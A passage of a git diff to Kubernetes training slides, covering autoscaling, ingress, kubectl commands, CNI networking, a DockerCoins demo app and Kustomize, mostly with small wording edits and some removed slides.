-## Adding a CPU request
-
-- Let's edit the deployment and add a CPU request
-
-- Since our server can use up to 1 core, let's request 1 core
-
-.exercise[
-
-- Edit the Deployment definition:
-  ```bash
-  kubectl edit deployment busyhttp
-  ```
-
-- In the `containers` list, add the following block:
-  ```yaml
-    resources:
-      requests:
-        cpu: "1"
-  ```
-
-]
-
----
-
-## Results
-
-- After saving and quitting, a rolling update happens
-
-  (if `ab` or `httping` exits, make sure to restart it)
-
-- It will take a minute or two for the HPA to kick in:
-
-  - the HPA runs every 30 seconds by default
-
-  - it needs to gather metrics from the metrics server first
-
-- If we scale further up (or down), the HPA will react after a few minutes:
-
-  - it won't scale up if it already scaled in the last 3 minutes
-
-  - it won't scale down if it already scaled in the last 5 minutes
-
----
-
-## What about other metrics?
-
-- The HPA in API group `autoscaling/v1` only supports CPU scaling
-
-- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
-
-  - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
-
-  - custom.metrics.k8s.io, custom metrics per Pod
-
-  - external.metrics.k8s.io, external metrics (not associated to Pods)
-
-- Kubernetes doesn't implement any of these API groups
-
-- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
-
-- The metrics provided by metrics server are standard; everything else is custom
-
-- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)

slides/k8s/ingress.md

@@ -88,7 +88,7 @@
 
   - the control loop watches over ingress resources, and configures the LB accordingly
 
-- Step 2: set up DNS
+- Step 2: setup DNS
 
   - associate DNS entries with the load balancer address
 
@@ -126,7 +126,7 @@
 
 - We could use pods specifying `hostPort: 80` 
 
-  ... but with most CNI plugins, this [doesn't work or requires additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
+  ... but with most CNI plugins, this [doesn't work or require additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
 
 - We could use a `NodePort` service
 
@@ -142,7 +142,7 @@
 
   (sometimes called sandbox or network sandbox)
 
-- An IP address is assigned to the pod
+- An IP address is associated to the pod
 
 - This IP address is routed/connected to the cluster network
 
@@ -239,7 +239,7 @@ class: extra-details
 
   - an error condition on the node
     <br/>
-    (for instance: "disk full," do not start new pods here!)
+    (for instance: "disk full", do not start new pods here!)
 
 - The `effect` can be:
 
@@ -501,11 +501,11 @@ spec:
 
   (as long as it has access to the cluster subnet)
 
-- This allows the use of external (hardware, physical machines...) load balancers
+- This allows to use external (hardware, physical machines...) load balancers
 
 - Annotations can encode special features
 
-  (rate-limiting, A/B testing, session stickiness, etc.)
+  (rate-limiting, A/B testing, session stickiness, etc.) 
 
 ---
 

slides/k8s/kubectlexpose.md

@@ -81,7 +81,7 @@ Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables`
 
 .exercise[
 
-- In another window, watch the pods (to see when they are created):
+- In another window, watch the pods (to see when they will be created):
   ```bash
   kubectl get pods -w
   ```
@@ -276,21 +276,3 @@ error: the server doesn't have a resource type "endpoint"
 - There is no `endpoint` object: `type Endpoints struct`
 
 - The type doesn't represent a single endpoint, but a list of endpoints
-
----
-
-## Exposing services to the outside world
-
-- The default type (ClusterIP) only works for internal traffic
-
-- If we want to accept external traffic, we can use one of these:
-
-  - NodePort (expose a service on a TCP port between 30000-32768)
-
-  - LoadBalancer (provision a cloud load balancer for our service)
-
-  - ExternalIP (use one node's external IP address)
-
-  - Ingress (a special mechanism for HTTP services)
-
-*We'll see NodePorts and Ingresses more in detail later.*

slides/k8s/kubectlget.md

@@ -79,8 +79,6 @@
 
 ---
 
-class: extra-details
-
 ## Exploring types and definitions
 
 - We can list all available resource types by running `kubectl api-resources`
@@ -104,11 +102,9 @@ class: extra-details
 
 ---
 
-class: extra-details
-
 ## Introspection vs. documentation
 
-- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
+- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
 
 - The API documentation is usually easier to read, but:
 
@@ -132,7 +128,7 @@ class: extra-details
 
   - short (e.g. `no`, `svc`, `deploy`)
 
-- Some resources do not have a short name
+- Some resources do not have a short names
 
 - `Endpoints` only have a plural form
 
@@ -466,4 +462,4 @@ class: extra-details
 - For more details, see [KEP-0009] or the [node controller documentation]
 
 [KEP-0009]: https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/0009-node-heartbeat.md
-[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
+[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller

slides/k8s/kubectlproxy.md

@@ -77,9 +77,9 @@ If we wanted to talk to the API, we would need to:
 
 - This is a great tool to learn and experiment with the Kubernetes API
 
-- ... And for serious uses as well (suitable for one-shot scripts)
+- ... And for serious usages as well (suitable for one-shot scripts)
 
-- For unattended use, it's better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
+- For unattended use, it is better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
 
 ---
 

slides/k8s/kubectlrun.md

@@ -320,8 +320,6 @@ We could! But the *deployment* would notice it right away, and scale back to the
 
 ---
 
-class: extra-details
-
 ### Streaming logs of many pods
 
 - Let's see what happens if we try to stream the logs for more than 5 pods
@@ -349,8 +347,6 @@ use --max-log-requests to increase the limit
 
 ---
 
-class: extra-details
-
 ## Why can't we stream the logs of many pods?
 
 - `kubectl` opens one connection to the API server per pod

slides/k8s/kubenet.md

@@ -16,8 +16,6 @@
 
  - each pod is aware of its IP address (no NAT)
 
- - pod IP addresses are assigned by the network implementation
-
 - Kubernetes doesn't mandate any particular implementation
 
 ---
@@ -32,7 +30,7 @@
 
 - No new protocol
 
-- The network implementation can decide how to allocate addresses
+- Pods cannot move from a node to another and keep their IP address
 
 - IP addresses don't have to be "portable" from a node to another
 
@@ -54,7 +52,7 @@
 
   (15 are listed in the Kubernetes documentation)
 
-- Pods have level 3 (IP) connectivity, but *services* are level 4 (TCP or UDP)
+- Pods have level 3 (IP) connectivity, but *services* are level 4
 
   (Services map to a single UDP or TCP port; no port ranges or arbitrary IP packets)
 
@@ -84,17 +82,13 @@
 
 ---
 
-class: extra-details
-
 ## The Container Network Interface (CNI)
 
-- Most Kubernetes clusters use CNI "plugins" to implement networking
+- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
 
-- When a pod is created, Kubernetes delegates the network setup to these plugins
+- When a pod is created, Kubernetes delegates the network setup to CNI plugins
 
-  (it can be a single plugin, or a combination of plugins, each doing one task)
-
-- Typically, CNI plugins will:
+- Typically, a CNI plugin will:
 
   - allocate an IP address (by calling an IPAM plugin)
 
@@ -102,46 +96,8 @@ class: extra-details
 
   - configure the interface as well as required routes etc.
 
----
+- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
 
-class: extra-details
+- Not all CNI plugins are equal
 
-## Multiple moving parts
-
-- The "pod-to-pod network" or "pod network":
-
-  - provides communication between pods and nodes
-
-  - is generally implemented with CNI plugins
-
-- The "pod-to-service network":
-
-  - provides internal communication and load balancing
-
-  - is generally implemented with kube-proxy (or e.g. kube-router)
-
-- Network policies:
-
-  - provide firewalling and isolation
-
-  - can be bundled with the "pod network" or provided by another component
-
----
-
-class: extra-details
-
-## Even more moving parts
-
-- Inbound traffic can be handled by multiple components:
-
-  - something like kube-proxy or kube-router (for NodePort services)
-
-  - load balancers (ideally, connected to the pod network)
-
-- It is possible to use multiple pod networks in parallel
-
-  (with "meta-plugins" like CNI-Genie or Multus)
-
-- Some solutions can fill multiple roles
-
-  (e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
+  (e.g. they don't all implement network policies, which are required to isolate pods)

slides/k8s/kubercoins.md

@@ -1,244 +0,0 @@
-# Deploying a sample application
-
-- We will connect to our new Kubernetes cluster
-
-- We will deploy a sample application, "DockerCoins"
-
-- That app features multiple micro-services and a web UI
-
----
-
-## Connecting to our Kubernetes cluster
-
-- Our cluster has multiple nodes named `node1`, `node2`, etc.
-
-- We will do everything from `node1`
-
-- We have SSH access to the other nodes, but won't need it
-
-  (but we can use it for debugging, troubleshooting, etc.)
-
-.exercise[
-
-- Log into `node1`
-
-- Check that all nodes are `Ready`:
-  ```bash
-  kubectl get nodes
-  ```
-
-]
-
----
-
-## Cloning some repos
-
-- We will need two repositories:
-
-  - the first one has the "DockerCoins" demo app
-
-  - the second one has these slides, some scripts, more manifests ...
-
-.exercise[
-
-- Clone the kubercoins repository on `node1`:
-  ```bash
-  git clone https://github.com/jpetazzo/kubercoins
-  ```
-
-
-- Clone the container.training repository as well:
-  ```bash
-  git clone https://@@GITREPO@@
-  ```
-
-]
-
----
-
-## Running the application
-
-Without further ado, let's start this application!
-
-.exercise[
-
-- Apply all the manifests from the kubercoins repository:
-  ```bash
-  kubectl apply -f kubercoins/
-  ```
-
-]
-
----
-
-## What's this application?
-
---
-
-- It is a DockerCoin miner! .emoji[💰🐳📦🚢]
-
---
-
-- No, you can't buy coffee with DockerCoins
-
---
-
-- How DockerCoins works:
-
-  - generate a few random bytes
-
-  - hash these bytes
-
-  - increment a counter (to keep track of speed)
-
-  - repeat forever!
-
---
-
-- DockerCoins is *not* a cryptocurrency
-
-  (the only common points are "randomness", "hashing", and "coins" in the name)
-
----
-
-## DockerCoins in the microservices era
-
-- DockerCoins is made of 5 services:
-
-  - `rng` = web service generating random bytes
-
-  - `hasher` = web service computing hash of POSTed data
-
-  - `worker` = background process calling `rng` and `hasher`
-
-  - `webui` = web interface to watch progress
-
-  - `redis` = data store (holds a counter updated by `worker`)
-
-- These 5 services are visible in the application's Compose file,
-  [docker-compose.yml](
-  https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml)
-
----
-
-## How DockerCoins works
-
-- `worker` invokes web service `rng` to generate random bytes
-
-- `worker` invokes web service `hasher` to hash these bytes
-
-- `worker` does this in an infinite loop
-
-- every second, `worker` updates `redis` to indicate how many loops were done
-
-- `webui` queries `redis`, and computes and exposes "hashing speed" in our browser
-
-*(See diagram on next slide!)*
-
----
-
-class: pic
-
-![Diagram showing the 5 containers of the applications](images/dockercoins-diagram.svg)
-
----
-
-## Service discovery in container-land
-
-How does each service find out the address of the other ones?
-
---
-
-- We do not hard-code IP addresses in the code
-
-- We do not hard-code FQDNs in the code, either
-
-- We just connect to a service name, and container-magic does the rest
-
-  (And by container-magic, we mean "a crafty, dynamic, embedded DNS server")
-
----
-
-## Example in `worker/worker.py`
-
-```python
-redis = Redis("`redis`")
-
-
-def get_random_bytes():
-    r = requests.get("http://`rng`/32")
-    return r.content
-
-
-def hash_bytes(data):
-    r = requests.post("http://`hasher`/",
-                      data=data,
-                      headers={"Content-Type": "application/octet-stream"})
-```
-
-(Full source code available [here](
-https://@@GITREPO@@/blob/8279a3bce9398f7c1a53bdd95187c53eda4e6435/dockercoins/worker/worker.py#L17
-))
-
----
-
-## Show me the code!
-
-- You can check the GitHub repository with all the materials of this workshop:
-  <br/>https://@@GITREPO@@
-
-- The application is in the [dockercoins](
-  https://@@GITREPO@@/tree/master/dockercoins)
-  subdirectory
-
-- The Compose file ([docker-compose.yml](
-  https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml))
-  lists all 5 services
-
-- `redis` is using an official image from the Docker Hub
-
-- `hasher`, `rng`, `worker`, `webui` are each built from a Dockerfile
-
-- Each service's Dockerfile and source code is in its own directory
-
-  (`hasher` is in the [hasher](https://@@GITREPO@@/blob/master/dockercoins/hasher/) directory,
-  `rng` is in the [rng](https://@@GITREPO@@/blob/master/dockercoins/rng/)
-  directory, etc.)
-
----
-
-## Our application at work
-
-- We can check the logs of our application's pods
-
-.exercise[
-
-- Check the logs of the various components:
-  ```bash
-  kubectl logs deploy/worker
-  kubectl logs deploy/hasher
-  ```
-
-]
-
----
-
-## Connecting to the web UI
-
-- "Logs are exciting and fun!" (No-one, ever)
-
-- The `webui` container exposes a web dashboard; let's view it
-
-.exercise[
-
-- Check the NodePort allocated to the web UI:
-  ```bash
-  kubectl get svc webui
-  ```
-
-- Open that in a web browser
-
-]
-
-A drawing area should show up, and after a few seconds, a blue
-graph will appear.

slides/k8s/kustomize.md

@@ -1,194 +0,0 @@
-# Kustomize
-
-- Kustomize lets us transform YAML files representing Kubernetes resources
-
-- The original YAML files are valid resource files
-
-  (e.g. they can be loaded with `kubectl apply -f`)
-
-- They are left untouched by Kustomize
-
-- Kustomize lets us define *overlays* that extend or change the resource files
-
----
-
-## Differences with Helm
-
-- Helm charts use placeholders `{{ like.this }}`
-
-- Kustomize "bases" are standard Kubernetes YAML
-
-- It is possible to use an existing set of YAML as a Kustomize base
-
-- As a result, writing a Helm chart is more work ...
-
-- ... But Helm charts are also more powerful; e.g. they can:
-
-  - use flags to conditionally include resources or blocks
-
-  - check if a given Kubernetes API group is supported
-
-  - [and much more](https://helm.sh/docs/chart_template_guide/)
-
----
-
-## Kustomize concepts
-
-- Kustomize needs a `kustomization.yaml` file
-
-- That file can be a *base* or a *variant*
-
-- If it's a *base*:
-
-  - it lists YAML resource files to use
-
-- If it's a *variant* (or *overlay*):
-
-  - it refers to (at least) one *base*
-
-  - and some *patches*
-
----
-
-## An easy way to get started with Kustomize
-
-- We are going to use [Replicated Ship](https://www.replicated.com/ship/) to experiment with Kustomize
-
-- The [Replicated Ship CLI](https://github.com/replicatedhq/ship/releases) has been installed on our clusters
-
-- Replicated Ship has multiple workflows; here is what we will do:
-
-  - initialize a Kustomize overlay from a remote GitHub repository
-
-  - customize some values using the web UI provided by Ship
-
-  - look at the resulting files and apply them to the cluster
-
----
-
-## Getting started with Ship
-
-- We need to run `ship init` in a new directory
-
-- `ship init` requires a URL to a remote repository containing Kubernetes YAML
-
-- It will clone that repository and start a web UI
-
-- Later, it can watch that repository and/or update from it
-
-- We will use the [jpetazzo/kubercoins](https://github.com/jpetazzo/kubercoins) repository
-
-  (it contains all the DockerCoins resources as YAML files)
-
----
-
-## `ship init`
-
-.exercise[
-
-- Change to a new directory:
-  ```bash
-  mkdir ~/kustomcoins
-  cd ~/kustomcoins
-  ```
-
-- Run `ship init` with the kustomcoins repository:
-  ```bash
-  ship init https://github.com/jpetazzo/kubercoins
-  ```
-
-]
-
----
-
-## Access the web UI
-
-- `ship init` tells us to connect on `localhost:8800`
-
-- We need to replace `localhost` with the address of our node
-
-  (since we run on a remote machine)
-
-- Follow the steps in the web UI, and change one parameter
-
-  (e.g. set the number of replicas in the worker Deployment)
-
-- Complete the web workflow, and go back to the CLI
-
----
-
-## Inspect the results
-
-- Look at the content of our directory
-
-- `base` contains the kubercoins repository + a `kustomization.yaml` file
-
-- `overlays/ship` contains the Kustomize overlay referencing the base + our patch(es)
-
-- `rendered.yaml` is a YAML bundle containing the patched application
-
-- `.ship` contains a state file used by Ship
-
----
-
-## Using the results
-
-- We can `kubectl apply -f rendered.yaml`
-
-  (on any version of Kubernetes)
-
-- Starting with Kubernetes 1.14, we can apply the overlay directly with:
-  ```bash
-  kubectl apply -k overlays/ship
-  ```
-
-- But let's not do that for now!
-
-- We will create a new copy of DockerCoins in another namespace
-
----
-
-## Deploy DockerCoins with Kustomize
-
-.exercise[
-
-- Create a new namespace:
-  ```bash
-  kubectl create namespace kustomcoins
-  ```
-
-- Deploy DockerCoins:
-  ```bash
-  kubectl apply -f rendered.yaml --namespace=kustomcoins
-  ```
-
-- Or, with Kubernetes 1.14, you can also do this:
-  ```bash
-  kubectl apply -k overlays/ship --namespace=kustomcoins
-  ```
-
-]
-
----
-
-## Checking our new copy of DockerCoins
-
-- We can check the worker logs, or the web UI
-
-.exercise[
-
-- Retrieve the NodePort number of the web UI:
-  ```bash
-  kubectl get service webui --namespace=kustomcoins
-  ```
-
-- Open it in a web browser
-
-- Look at the worker logs:
-  ```bash
-  kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
-  ```
-
-]
-
-Note: it might take a minute or two for the worker to start.

slides/k8s/lastwords-admin.md

@@ -48,7 +48,7 @@
 
 - Acknowledge that a lot of tasks are outsourced
 
-  (e.g. if we add "buy/rack/provision machines" in that list)
+  (e.g. if we add "buy / rack / provision machines" in that list)
 
 ---
 
@@ -120,9 +120,9 @@
 
 - Team "build" ships ready-to-run manifests
 
-  (YAML, Helm charts, Kustomize ...)
+  (YAML, Helm Charts, Kustomize ...)
 
-- Team "run" adjusts some parameters and monitors the application
+- Team "run" adjusts some parameters and monitors the application 
 
 ✔️ parity between dev and prod environments
 
@@ -150,7 +150,7 @@
 
   - do we reward on-call duty without encouraging hero syndrome?
 
-  - do we give people resources (time, money) to learn?
+  - do we give resources (time, money) to people to learn?
 
 ---
 
@@ -183,9 +183,9 @@ are a few tools that can help us.*
 
 - If cloud: public vs. private
 
-- Which vendor/distribution to pick?
+- Which vendor / distribution to pick?
 
-- Which versions/features to enable?
+- Which versions / features to enable?
 
 ---
 
@@ -205,6 +205,6 @@ are a few tools that can help us.*
 
 - Transfer knowledge
 
-  (make sure everyone is on the same page/level)
+  (make sure everyone is on the same page / same level)
 
 - Iterate!